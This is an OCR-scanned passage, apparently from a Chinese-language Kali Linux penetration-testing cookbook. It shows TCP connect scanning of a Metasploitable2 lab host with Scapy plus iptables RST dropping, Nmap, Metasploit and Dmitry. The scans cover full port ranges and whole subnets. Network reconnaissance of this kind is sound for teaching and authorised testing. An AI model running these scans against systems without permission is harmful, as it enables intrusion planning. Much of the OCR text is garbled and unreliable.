使 用 IP. 表 建 立 过 滤 机 制 ， 我 们 可 以 去 掉 RST 封包 来 完成 三 次 握手 ， 而 不 会 干扰 到 
整个 系统 (这 个 配置 出 于 功能 上 的 原理 并 不 推荐 ) 。 为 了 展示 完整 三 次 握手 的 成 功 
建立 ， 我 们 使 用 Netcat 建立 TCP 监听 服务 。 之 后 尝试 使 用 Scapy 连接 开放 的 端 

Wo 


adminQubuntu:-$ nc -lvp 4444 
listening on [any] 4444 ... 


这 个 例子 中 ， 我 们 在 TCP 3 v 4444 开启 了 监听 服务 。 我 们 之 后 可 以 修改 之 前 的 脚 
本 来 尝试 连接 端口 4444 上 的 Netcat 监听 服务 。 


#!/usr/bin/python 


import logging 
logging. getLogger("Scapy. runtime") .setLevel(logging.ERROR) 
from scapy.all import * 


response = sri(IP(dst="172.16.36.135")/TCP(dport=4444, f lags-'S') 


) 
reply = sri(IP(dst="172.16.36.135")/TCP(dport=4444, flags='A', ack 


=(resp onse[TCP].seq + 1))) 


这 个 脚本 中 ，SYN 请 求 发 送 给 了 监听 端口 。 收 到 SYN+ACK 回复 之 后 ， 会 发 送 
ACK 回 复 。 为 了 验证 连接 尝试 被 系统 生成 的 RST 封包 打 断 ， 这 个 脚本 应 该 在 
Wireshark 局 动 之 后 执行 ， 来 捕获 请 求 著 力 。 我 们 使 用 Wireshark 的 过 滤器 来 隔离 
连接 尝试 序列 。 所 使 用 的 过 滤器 

是 tcp && (ip,src == 172.16.36.135 || ip.dst == 172.16.36.135) ° 3X 
滤器 仅仅 用 于 展示 来 自 或 发 往 被 扫描 系统 的 TCP 流量 。 像 这 样 : 





既然 我 们 已 经 精确 定位 了 问题 。 我 们 可 以 建立 过 滤器 ， 让 我 们 能 够 去 除 系 统 生 成 的 
RST 封包 。 这 个 过 滤器 可 以 通过 修改 本 地 |P 表 来 建立 : 
以 如 下 方式 修改 本 地 IP 表 会 通过 阻塞 所 有 发 出 的 RST 响应 ， 改 变 和 目标 系统 
Z la) 4) TCP/IP 事务 的 处 理 方式 。 确 保 常见 的 iptable 规则 在 这 个 秘籍 完成 之 后 
移 除 ， 或 者 之 后 使 用 下 列 命令 刷新 iptable 。 


iptables --flush 
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root@KaliLinux:~# iptables -A OUTPUT -p tcp --tcp-flags RST RST 
-d 172.16.36.135 -j DROP 

root@KaliLinux:~# iptables --list 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 

target prot opt source destination 

DROP tcp -- anywhere 172.16.36.135 tcp 
flags:RST/RST 


在 这 个 例子 中 ， 本 地 IP 表 的 修改 去 除了 所 有 发 往 被 扫描 主机 的 目标 地 址 的 TCP 
RST 封包 。 list 选项 随后 可 以 用 于 查看 IP 表 的 条 目 ， 以 及 验证 配置 已 经 做 了 修 
改 。 为 了 执行 另 一 次 连接 尝试， 我 们 需要 确保 Natcat 仍旧 监听 目标 的 4444 端口 ， 
像 这 样 : 


adminQubuntu:-$ nc -lvp 4444 
listening on [any] 4444 ... 


和 之 前 相同 的 Python 脚本 可 以 再 次 使 用 ， 同 时 Wireshark 会 捕获 后 台 的 流量 。 使 
用 之 前 讨论 的 显示 过 滤器 ， 我 们 可 以 轻易 专注 于 所 需 的 流量 。 要 注意 三 次 握手 的 所 
有 步骤 现在 都 可 以 完成 ， 而 不 会 收 到 系统 生成 的 RST 封包 的 打 断 ， 像 这 样 : 





此 外 ， 如 果 我 们 看 一 看 运行 在 目标 系统 的 Netcat 服务 ， 我 们 可 以 注意 到 ， 已 经 建 
立 了 连接 。 这 是 用 于 确认 成 功 建立 连接 的 进一步 的 证 据 。 这 可 以 在 下 面 的 输出 中 看 
到 : 


adminQubuntu:-$ nc -lvp 4444 

listening on [any] 4444 ... 172.16.36.132: inverse host lookup f 
ailed: No address associated with name 

connect to [172.16.36.135] from (UNKNOWN) [172.16.36.132] 42409 


虽然 这 个 练习 对 理解 和 解决 TCP 连接 的 问题 十 分 有 帮助 ， 恢 复 IP 表 的 条 目 也 十 分 
重要 。RST 封包 是 TCP 通信 的 重要 组 成 部 分 ， 去 除 这 些 响 应 会 影响 正常 的 通信 功 
能 。 洗 号 按 的 命令 可 以 用 于 刷新 我 们 的 iptable 规则 ， 并 验证 刷新 成 功 : 


root@KaliLinux:~# iptables --flush 

root@KaliLinux:~# iptables --list 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 


target prot opt source destination 


就 像 例子 中 展示 的 那样 ， flush 选项 应 该 用 于 清楚 IP 表 的 条 目 。 我 们 可 以 多 次 使 
用 list 选项 来 验证 |P 表 的 条 目 已 经 移 除 了 。 


工作 原理 

执行 TCP 连接 扫描 的 同居 通过 执行 完整 的 三 次 握手 ， 和 远程 系统 的 所 有 被 扫描 端 
口 建立 连接 。 端 OMA WRT HES 成 功 建立 。 如 果 连 接 建 立 ， 端 口 被 认为 是 
开放 的 ， 如 果 连 接 不 能 成 功 建立 ， 端 口 被 认为 是 关闭 的 。 

3.11 Nmap 连接 扫描 


TCP 连接 扫描 通过 与 远程 主机 上 的 每 个 被 扫描 的 端口 建立 完整 的 TCP 连接 来 执 
行 。 这 个 秘籍 展示 了 如 何 使 用 Nmap 来 执行 TCP 连接 扫描 。 


准备 
为 了 使 用 Nmap 执行 TCP 隐秘 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服务 


器 。 A M Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 
的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 


操作 步骤 


拥有 简化 TCP 连接 扫描 执行 过 程 的 选项 。 为 了 使 用 Nmap 执行 TCP 连接 扫 
， 应 使 用 -sT 选项 ， 并 附带 被 扫描 主机 的 IP 地 址 。 


root@KaliLinux:~# nmap -sT 172.16.36.135 -p 80 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 22:03 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00072s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds 


在 提供 的 例子 中 ， 特 定 的 IP 地 址 的 TCP 80 端口 上 执行 了 TCP 隐秘 扫描 。 和 
Scapy 中 的 技巧 相似 ，Nmap 监听 响应 并 通过 分 析 响 应 中 所 激活 的 TCP 标识 来 识 
别 开 放 端 口 。 我 们 也 可 以 使 用 Nmap 执行 多 个 特定 端口 的 扫描 ， 通 过 传递 喜 号 分 隔 
的 端口 号 列表 。 


root@KaliLinux:~# nmap -sT 172.16.36.135 -p 21,80,443 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 22:03 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00012s latency). 

PORT STATE SERVICE 

21/tcp open ftp 

80/tcp open http 

443/tcp closed https 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds 


在 这 个 例子 中 ， 目 标 IP 地 址 的 端口 21、80 fe 443 上 执行 了 TCP 连接 扫描 。 我 们 
也 可 以 使 用 Nmap 来 扫描 主机 序列 ， 通 过 标明 要 扫描 的 第 一 个 和 最 后 一 个 端口 号 ， 
以 破 折 号 分 隔 : 


root@KaliLinux:~# nmap -sT 172.16.36.135 -p 20-25 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:48 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00019s latency). 

PORT STATE SERVICE 

20/tcp closed ftp-data 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

24/tcp closed priv-mail 

25/tcp open smtp 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds 


在 所 提供 的 例子 中 ，SYN 扫描 在 TCP 20 到 25 端口 上 执行 。 除 了 拥有 指定 被 扫描 
端口 的 能 力 之 外 。Nmap 同时 拥有 配置 好 的 1000 和 常用 端口 的 列表 。 我 们 可 以 执 
行 这 些 端 口上 的 扫描 ， 通 过 不 带 任何 端口 指定 信息 来 运行 Nmap: 


root@KaliLinux:~# nmap -sT 172.16.36.135 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 22:13 EST 
Nmap scan report for 172.16.36.135 
Host is up (0.00025s latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

23/ GED open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 
1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
3306/tcp open mysql 

5432/tcp open postgresql 

5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open irc 

8009/tcp open ajp13 

8180/tcp open unknown 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds 


在 上 面 的 例子 中 ， 扫 描 了 Nmap 定义 的 1000 个 常用 端口 ， 用 于 识别 
Metasploitable2 系统 上 的 大 量 开放 端口 。 虽 然 这 个 技巧 在 是 被 多 数 设 备 上 很 高 效 ， 
但 是 也 可 能 无 法 识别 模糊 的 服务 或 者 不 常见 的 端口 组 合 。 如 果 扫 描 在 所 有 可 能 的 
TCP 端口 上 执行 ， 所 有 可 能 的 端口 地 址 值 都 需要 被 扫描 。 定 义 了 源 端 口 和 目标 端口 
地 址 的 TCP 头 部 部 分 是 16 位 长 。 并 且 ， 每 一 位 可 以 为 1 或 者 0。 因 此 ， 共 

有 2 ** 16 或 者 65536 个 可 能 的 TCP 端口 地 址 。 对 于 要 扫描 的 全 部 可 能 的 地 址 
空间 ， 需 要 提供 0 到 65535 的 端口 范围 ， 像 这 样 : 


root@KaliLinux:~# nmap -sT 172.16.36.135 -p 0-65535 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 22:14 EST 
Nmap scan report for 172.16.36.135 
Host is up (0.00076s latency). 
Not shown: 65506 closed ports 
PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

237 EGD open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 
139/tcp | open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 
1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
3632/tcp open distccd 
5432/tcp open postgresql 
5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open irc 

6697/tcp open unknown 
8009/tcp open 4ajp13 
8180/tcp open unknown 
8787/tcp open unknown 
34789/tcp open unknown 
50333/tcp open unknown 
56375/tcp open unknown 
57385/tcp open unknown 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 17.05 seconds 


这 个 例子 中 ，Metasploitable2 系统 上 所 有 可 能 的 65536 fe TCP 地 址 都 扫描 了 一 
遍 。 要 注意 该 扫描 中 识别 的 多 数 服务 都 在 标准 的 Nmap 1000 扫描 中 识别 过 了 。 这 
就 表明 在 尝试 识别 目标 的 所 有 可 能 的 攻击 面 的 时 候 ， 完 整 扫描 是 个 最 佳 实践 。 
Nmap 可 以 使 用 破 折 号 记 法 ， 扫 描 主机 列表 上 的 TCP 端口 : 


root@KaliLinux:~# nmap 172.16.36.0-255 -sT -p 80 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 22:16 EST 
Nmap scan report for 172.16.36.1 Host is up (0.00026s latency). 
PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 172.16.36.2 Host is up (0.00018s latency). 
PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:FF:2A:8E (VMware) 


Nmap scan report for 172.16.36.132 Host is up (0.00047s latency) 


PORT STATE SERVICE 
80/tcp closed http 
MAC Address: 00:0C:29:65:FC:D2 (VMware) 


Nmap scan report for 172.16.36.135 

Host is up (0.00016s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap scan report for 172.16.36.180 
Host is up (0.0029s latency). 

PORT STATE SERVICE 

80/tcp open http 


Nmap done: 256 IP addresses (5 hosts up) scanned in 42.55 second 
S 


这 个 例子 中 ，TCP 80 端口 的 TCP 连接 扫描 在 指定 地 址 范围 内 的 所 有 主机 上 执行 。 
虽然 这 个 特定 的 扫描 仅仅 执行 在 单个 端口 上 ，Nmap 也 能 够 同时 扫描 多 个 系统 上 的 
多 个 端口 和 端口 范围 。 此 外 ，Nmap 也 能 够 进行 配置 ， 基 于 IP 地 址 的 输入 列表 来 

扫描 主机 。 这 可 以 通过 -iL 选项 并 指定 文件 名 ， 如 果 文 件 存 放 于 执行 目录 中 ， 或 
者 文件 路 径 来 完成 。Nmap 之 后 会 遍历 输入 列表 中 的 每 个 地 址 ， 并 对 地 址 执行 特定 
的 扫描 。 


root@KaliLinux:~# cat iplist.txt 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 


root@KaliLinux:~# nmap -sT -iL iplist.txt -p 80 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 22:17 EST 
Nmap scan report for 172.16.36.1 

Host is up (0.00016s latency). 

PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 172.16.36.2 

Host is up (0.00047s latency). 

PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:FF:2A:8E (VMware) 


Nmap scan report for 172.16.36.132 

Host is up (0.00034s latency). 

PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 


Nmap scan report for 172.16.36.135 

Host is up (0.00016s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 4 IP addresses (4 hosts up) scanned in 13.05 seconds 


工作 原理 

执行 TCP 连接 所 描 的 工具 通过 执行 完整 的 三 次 握手 ， 和 远程 系统 的 所 有 被 扫描 端 
口 建立 连接 。 端 口 的 状态 取决 于 连接 是 否 成 功 建立 。 如 果 连 接 建立 ， 端 口 被 认为 是 
开放 的 ， 如 果 连 接 不 能 成 功 建立 ， 端 口 被 认为 是 关闭 的 。 

3.12 Metasploit 连接 扫描 

除了 其 它 可 用 的 工具 之 外 ，Metasploit 拥有 用 于 远程 系统 的 TCP 连接 扫描 的 辅助 模 


块 。 将 Metasploit 用 于 扫描 ， 以 及 利用 ， 能 够 高 效 减 少 用 于 完成 渗透 测试 所 需 工具 
数量 。 这 个 秘籍 展示 了 如 何 使 用 Metasploit 来 执行 TCP 连接 扫描 。 


准备 


为 了 使 用 Metasploit 执行 TCP 连接 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服 
务 器 。 这 个 例子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


操作 步骤 


Metasploit 拥有 可 以 对 特定 TCP 端口 执行 TCP 连接 扫描 的 辅助 模块 。 为 了 在 Kali 
中 启动 Metasploit， 我 们 在 终端 中 执行 msfconsole 命令 。 


root@KaliLinux:~# msfconsole 
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 


MMMMMMMMMMM MMMMMMMMMM 
MMMN$ vMMMM 
MMMN1 MMMMM MMMMM JMMMM 
MMMNL MMMMMMMN NMMMMMMM = JMMMM 
MMMNL = MMMMMMMMMNmmmNMMMMMMMMM = JMMMM 
MMMNI MMMMMMMMMMMMMMMMMMMMMMM JjMMMM 
MMMNI MMMMMMMMMMMMMMMMMMMMMMM = jMMMM 
MMMNI MMMMM MMMMMMM MMMMM — jMMMM 
MMMNI MMMMM MMMMMMM MMMMM — jMMMM 
MMMNI  MMMNM MMMMMMM MMMMM — jMMMM 
MMMNI  WMMMM MMMMMMM MMMM# JMMMM 
MMMMR ?MMNM MMMMM .dMMMM 
MMMMNm '?MMM MMMM' dMMMMM 
MMMMMMN = ?MM MM? NMMMMMN 
MMMMMMMMNe JMMMMMNMMM 
MMMMMMMMMMNm , eMMMMMNMMNMM 
MMMMNNMNMMMMMNX 

NMNMMNMMNMM 


http://metasploit.pro 


MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+. . +MMNMM 


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro -- 


type 'go pro' to launch it now. 


qu 
aee 


-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
-[ 1053 exploits - 590 auxiliary - 174 post 
-[ 275 payloads - 28 encoders - 8 nops 


msf » use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name 


Current Setting Required Description 


CONCURRENCY 10 
rent ports to check per hos 


PORTS 1-10000 
2225,80,110-900) 
RHOSTS 
ange or CIDR identifier 
THREADS 1 
rent threads 
TIMEOUT 1000 


ut in milliseconds 


The number of concur 


Ports to scan (e. 


g. 


The target address r 


The number of concur 


The reply read timeo 


为 了 在 Metasploit 中 执行 TCP 连接 扫描 ， 以 辅助 模块 的 相对 路 径 调 用 use 
一 旦 模块 被 选中 ， 可 以 执行 show options 命令 来 确认 或 修改 扫描 配置 。 这 
令 会 展示 四 列 的 表格 ， 包 


AA 


vn ^ 
个 命 


| 了 | 


o 


4$ name ^ current settings ^ required 和 description ° name 列 标 出 
了 每 个 可 配置 变量 的 名 称 。 current settings 列 列 出 了 任何 给 定 变 量 的 现 有 配 
置 。 required 列 标 出 对 于 任何 给 定 变 量 ， 值 是 否 是 必须 的 。 description 列 描 
述 了 每 个 变量 的 功能 。 任 何 给 定 变 量 的 值 可 以 使 用 set 命令 ， 并 且 将 新 的 值 作为 
参数 来 修改 。 


msf auxiliary(tcp) > set RHOSTS 172.16.36.135 
RHOSTS => 172.16.36.135 

msf auxiliary(tcp) > set PORTS 80 

PORTS => 80 

msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 

CONCURRENCY 10 yes The number of concurr 
ent ports to check per hos 

PORTS 80 yes Ports to scan (e.g. 2 
225,80, 110-900) 

RHOSTS 172.16.36.135 yes The target address ra 
nge or CIDR identifier 

THREADS 1 yes The number of concurr 
ent threads 

TIMEOUT 1000 yes The reply read timeou 


t in milliseconds 
msf auxiliary(tcp) > run 


[*] 172.16.36.135:80 - TCP OPEN 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


在 上 面 的 例子 中 ， RHOSTS 4&4 RA RAAT Heda th 0) SEE AA IP 地址。 此 外 ， 
线程 数量 修改 为 20。 PORTS 值 设 为 TCP 端口 80 (HTTP) 。 修 改 了 必要 的 变量 
之 后 ， 可 以 再 次 使 用 show options 命令 来 验证 。 一 旦 所 需 配 置 验证 完毕 ， 就 可 
以 执行 扫描 了 。 


run 命令 对 指定 IP 地 址 的 80 端口 执行 TCP 连接 扫描 。 这 个 TCP 连接 扫描 也 可 
以 对 TCP 端口 序列 执行 ， 通 过 提供 第 一 个 和 最 后 一 个 值 ， 以 破 折 号 分 隔 : 


msf auxiliary(tcp) > set PORTS 0-100 
PORTS => 0-100 

msf auxiliary(tcp) > set THREADS 20 
THREADS -» 20 

msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 

CONCURRENCY 10 yes The number of concurr 
ent ports to check per hos 

PORTS 0-100 yes Ports to scan (e.g. 2 
225,80,110-900) 

RHOSTS 172.16.36.135 yes The target address ra 
nge or CIDR identifier 

THREADS 20 yes The number of concurr 
ent threads 

TIMEOUT 1000 yes The reply read timeo 


ut in milliseconds 
msf auxiliary(tcp) > run 


172.16.36.135:25 - TCP OPEN 
172.16.36.135:23 - TCP OPEN 
172.16.36.135:22 - TCP OPEN 
172.16.36.135:21 - TCP OPEN 
172.16.36.135:53 - TCP OPEN 
172.16.36.135:80 - TCP OPEN 
Scanned 1 of 1 hosts (100% complete) 
Auxiliary module execution completed 


[carm Fam am eem mem 
PESO Por se oe A SO d 
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这 个 例子 中 ， 线 程 数量 修改 为 20° THREADS 的 值 定 义 了 在 后 台 执 行 的 当前 任务 数 
量 。 确 定 线程 数量 涉及 到 寻找 一 个 平衡 ， 既 能 提升 任务 速度 ， 又 不 会 过 度 消 耗 系统 

资源 。 对 于 多 数 系统 ，20 个 线程 可 以 足够 快 ， 并 且 相 当 人 合理 。 虽 然 这 个 扫描 识别 了 
目标 系 多 个 设备 ， 我 们 不 能 确认 所 有 设备 都 识别 出 来 ， 除 非 所 有 可 能 的 端口 地 
址 都 扫描 到 。 定 义 来 源 和 目标 端口 地 址 的 TCP 头 部 部 分 是 16 位 长 。 并 且 ， 每 一 位 
可 以 为 1 es 因此 ， 共 有 2 ** 16 或 65536 个 可 能 的 TCP 端口 地 址 。 对 于 

要 扫描 的 整个 地 址 空间 ， 需要 提供 0 到 65535 的 端口 范围 ， 像 这 样 : 


msf auxiliary(tcp) > set PORTS 0-65535 
PORTS => 0-65535 
msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 


CONCURRENCY 10 yes The number of concurr 
ent ports to check per host 


PORTS 0-65535 yes Ports to scan (e.g. 2 
225,80,110-900) 


RHOSTS 172 SG 262135 yes The target address ra 
nge or CIDR identifier 

THREADS 20 yes The number of concurr 
ent threads 

TIMEOUT 1000 yes The reply read timeou 


t in milliseconds 
msf auxiliary(tcp) > run 


172.16.36.135:25 - TCP OPEN 
172.16.36.135:23 - TCP OPEN 
172.16.36.135:22 - TCP OPEN 
172.16.36.135:21 - TCP OPEN 
172.16.36.135:53 - TCP OPEN 
172.16.36.135:80 - TCP OPEN 
172.16.36.135:111 - TCP OPEN 
172.16.36.135:139 - TCP OPEN 
172.16.36.135:445 TCP OPEN 
172.16.36.135:514 TCP OPEN 
172.16.36.135:513 - TCP OPEN 
172.16.36.135:512 TCP OPEN 
172.16.36.135:1099 - TCP OPEN 
172.16.36.135:1524 - TCP OPEN 
172.16.36.135:2049 - TCP OPEN 
172.16.36.135:2121 - TCP OPEN 
172.16.36.135:3306 - TCP OPEN 
172.16.36.135:3632 - TCP OPEN 
172.16.36.135:5432 - TCP OPEN 
172.16.36.135:5900 - TCP OPEN 
172.16.36.135:6000 - TCP OPEN 
172.16.36.135:6667 - TCP OPEN 
172.16.36.135:6697 - TCP OPEN 
172.16.36.135:8009 - TCP OPEN 
172.16.36.135:8180 - TCP OPEN 
172.16.36.135:8787 - TCP OPEN 
172.16.36.135:34789 - TCP OPEN 
172.16.36.135:50333 - TCP OPEN 
172.16.36.135:56375 - TCP OPEN 
172.16.36.135:57385 - TCP OPEN 
Scanned 1 of 1 hosts (100% complete) 
Auxiliary module execution completed 
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在 这 个 例子 中 ， 远 程 系 统 的 所 有 开放 端口 都 由 扫描 所 有 可 能 的 TCP 端口 地 址 来 识 
别 。 我 们 也 可 以 修改 扫描 配置 使 用 破 折 号 记 法 来 扫描 地 址 序列 。 


上 。 与 之 相似 ， 


msf 
RHOSTS 
msf 


auxiliary(tcp) » set RHOSTS 172.16.36.0-255 
=> 172.16.36.0-255 
auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name 


Current Setting Required 


Description 


CONCURRENCY 10 yes The number of concurr 
ent ports to check per host 
PORTS 80 yes Ports to scan (e.g. 2 
225, 80,110-900) 
RHOSTS 172.16.36.0-255 yes The target address ra 
nge or CIDR identifier 
THREADS 20 yes The number of concurr 
ent threads 
TIMEOUT 1000 yes The reply read timeou 
t in milliseconds 
msf auxiliary(tcp) > run 
[*] Scanned 026 of 256 hosts (010% complete) 
[*] Scanned 056 of 256 hosts (021% complete) 
[*] Scanned 078 of 256 hosts (030% complete) 
[*] Scanned 103 of 256 hosts (040% complete) 
[*] 172.16.36.135:22 - TCP OPEN 
[*] 172.16.36.135:80 - TCP OPEN 
[*] 172.16.36.132:22 - TCP OPEN 
[*] Scanned 128 of 256 hosts (050% complete) 
[*] Scanned 161 of 256 hosts (062% complete) 
[*] 172.16.36.180:22 - TCP OPEN 
[*] 172.16.36.180:80 - TCP OPEN 
[*] Scanned 180 of 256 hosts (070% complete) 
[*] Scanned 206 of 256 hosts (080% complete) 
[*] Scanned 232 of 256 hosts (090% complete) 
[*] Scanned 256 of 256 hosts (100% complete) 
[*] 


这 个 例子 中 ，TCP 连接 扫描 执行 在 由 RHOST 
RHOSTS 可 以 使 用 CIDR 记 法 定义 网 络 范围 。 


Auxiliary module execution completed 


变量 指定 的 所 有 主机 地 址 的 BO 端口 


msf auxiliary(tcp) > set RHOSTS 172.16.36.0/24 
RHOSTS -» 172.16.36.0/24 
msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 

CONCURRENCY 10 yes The number of concurr 
ent ports to check per host 

PORTS 80 yes Ports to scan (e.g. 2 
225, 80,110-900) 

RHOSTS 172.16.36.0/24 yes The target address ra 
nge or CIDR identifier 

THREADS 20 yes The number of concurr 
ent threads 

TIMEOUT 1000 yes The reply read timeou 


t in milliseconds 
msf auxiliary(tcp) > run 


*] Scanned 038 of 256 hosts (014% complete) 
*] Scanned 053 of 256 hosts (020% complete) 
*] Scanned 080 of 256 hosts (031% complete) 
*] Scanned 103 of 256 hosts (040% complete) 
*] 172.16.36.135:80 - TCP OPEN 

*] 172.16.36.135:22 - TCP OPEN 

*] 172.16.36.132:22 - TCP OPEN 

*] Scanned 138 of 256 hosts (053% complete) 
*] Scanned 157 of 256 hosts (061% complete) 
*] 172.16.36.180:22 - TCP OPEN 

*] 172.16.36.180:80 - TCP OPEN 

*] Scanned 182 of 256 hosts (071% complete) 
*] Scanned 210 of 256 hosts (082% complete) 
*] Scanned 238 of 256 hosts (092% complete) 
*] Scanned 256 of 256 hosts (100% complete) 
*] Auxiliary module execution completed 


Ee de a ee a eee een ee Ee ek ee eer es 


工作 原理 


Metasploit TCP 连接 扫描 辅助 模块 背后 的 底层 原理 和 任何 其 它 TCP 连 扫描 工具 一 
样 。 使 用 MEtasploit 来 执行 这 种 扫描 的 有 点 事 ， 它 可 以 降低 所 需 工 具 的 总 数 。 


3.13 Dmitry 连接 扫描 


另 一 个 可 以 对 远程 系统 执行 TCP 连接 扫描 的 替代 工具 就 是 Dmitry。 不 像 Nmap 和 
Metasploit > Dmitry 是 个 非常 简单 的 工具 ， 我 们 可 以 使 用 它 来 执行 简单 快速 的 扫 
描 ， 而 不 需要 任何 配置 。 这 个 秘籍 展示 了 如 何 使 用 Dmitry 来 自 执 行 TCP 连接 扫 


描 。 


准备 


为 了 使 用 Dmitry 执行 TCP 连接 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服务 
器 。 这 个 例子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 


的 更 多 信息 请 


操作 步骤 


参考 第 一 章 中 的 “安装 Metasploitable2"$54$ » 


Dmitry 是 个 多 用 途 的 工具 ， 可 以 用 于 执行 目标 系统 上 的 TCP 扫描 。 它 的 功能 十 分 
有 限 ， 但 是 它 是 个 简单 的 工具 ， 快 速 而 高 效 。 为 了 查看 Dmitry 的 可 用 选项 ， 我 们 
在 终端 中 不 带 任何 参数 来 启动 这 个 程序 : 


root@KaliLinux:~# dmitry 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


Usage: 
-0 


e 
-W 
-n 
-S 
Ze 
-p 

e 


dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host 
Save output to %host.txt or to file specified by -o file 


Perform a whois lookup on the IP address of a host 
Perform a whois lookup on the domain name of a host 
Retrieve Netcraft.com information on a host 

Perform a search for possible subdomains 

Perform a search for possible email addresses 

Perform a TCP port scan on a host 

Perform a TCP port scan on a host showing output reportin 


g filtered ports 


* -b 


Read in the banner received from the scanned port 


* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Defau 


it 25) 


*Requires the -p flagged to be passed 


就 像 输 出 中 所 说 的 那样 ， -p 选项 用 于 执行 TCP 端口 扫描 。 为 了 实现 它 ， 我 们 以 
被 扫描 系统 的 IP. 地 址 来 使 用 这 个 选项 。Dmitry 拥有 150 个 常用 的 预 配置 端口 ， 它 
* 


会 扫描 这 些 。 在 这 些 端口 中 ， 


会 展示 任何 发 现 的 开放 端口 。 考 虑 下 面 的 例子 : 


root@KaliLinux:~# dmitry -p 172.16.36.135 
Deepmagic Information Gathering 
Tool "There be some deep magic going on" 


ERROR: Unable to locate Host Name for 172.16.36.135 
Continuing with limited modules 
HostIP:172.16.36.135 

HostName: 


Gathered TCP Port information for 172.16.36.135 


Port State 


21/tcp open 
22/tcp open 
23/tcp open 
25/tcp open 
53/tcp open 
80/tcp open 
111/tcp open 
139/tcp open 


Portscan Finished: Scanned 150 ports, 141 ports were in state cl 
osed 


Dmitry 中 的 TCP 端口 扫描 并 不 能 自 定义 。 但 是 它 是 个 简单 高 效 的 方法 来 访问 单个 
主机 上 的 常用 服务 。 我 们 也 可 以 使 用 -0 选项 ， 并 通过 指定 文件 名 称 ， 将 DMitry 
扫描 结果 输出 到 文本 文件 中 。 


root@KaliLinux:~# dmitry -p 172.16.36.135 -o output 
root@KaliLinux:~# ls Desktop output.txt 
root@KaliLinux:~# cat output.txt 

ERROR: Unable to locate 

